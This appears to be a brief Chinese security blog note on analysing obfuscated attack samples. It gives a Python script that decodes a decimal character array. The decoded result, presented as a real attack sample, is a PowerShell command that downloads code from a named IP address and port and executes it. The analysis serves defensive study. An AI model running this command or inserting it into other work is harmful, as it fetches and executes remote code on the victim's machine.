title:【样本分析】SQL注入分析
概述
SQL 注入相关样本分析及工具等
常见的 WebShell 形式的 SQL 注入攻击都会进行变形操作,倒是很难直接理解要执行的具体逻辑是什么。但是也可以通过 Hook 最终执行的函数来获取执行语句。
常见数据转换脚本
Hex 转 String
网上有现成的工具
Python 脚本
十进制 Char 数据转明文
# 十进制字符数据转换为明文
data = [38, 40, 34, 123, 48, 125, 123, 49, 125, 34, 32, 45, 102, 32, 39, 73, 69, 39, 44, 39, 88, 39, 41, 32, 40, 40, 38, 40, 34, 123, 49, 125, 123, 50, 125, 123, 48, 125, 34, 45, 102, 39, 116, 39, 44, 39, 110, 101, 119, 45, 39, 44, 39, 111, 98, 106, 101, 99, 39, 41, 32, 40, 34, 123, 49, 125, 123, 48, 125, 123, 50, 125, 34, 32, 45, 102, 39, 101, 116, 46, 119, 101, 98, 99, 108, 105, 101, 39, 44, 39, 110, 39, 44, 39, 110, 116, 39, 41, 41, 46, 40, 34, 123, 52, 125, 123, 48, 125, 123, 51, 125, 123, 49, 125, 123, 50, 125, 34, 45, 102, 32, 39, 111, 39, 44, 39, 115, 116, 114, 39, 44, 39, 105, 110, 103, 39, 44, 39, 119, 110, 108, 111, 97, 100, 39, 44, 39, 100, 39, 41, 46, 73, 110, 118, 111, 107, 101, 40, 40, 34, 123, 51, 125, 123, 54, 125, 123, 48, 125, 123, 49, 125, 123, 52, 125, 123, 50, 125, 123, 53, 125, 34, 32, 45, 102, 32, 39, 47, 47, 49, 53, 54, 46, 50, 51, 52, 46, 57, 52, 46, 49, 57, 52, 58, 39, 44, 39, 52, 39, 44, 39, 49, 39, 44, 39, 104, 116, 116, 112, 39, 44, 39, 48, 39, 44, 39, 49, 52, 47, 118, 68, 97, 109, 117, 39, 44, 39, 58, 39, 41, 41, 41]
# 转换为字符
result = ''.join([chr(num) for num in data])
print("转换结果:")
print(result)
print("\n格式化后:")
print(result.replace(' ', ''))上述数据解析后的脚本如下所示,这是一个真实的攻击样本:
IEX ((New-Object Net.WebClient).DownloadString('http://156.234.94.194:40114/vDamu'))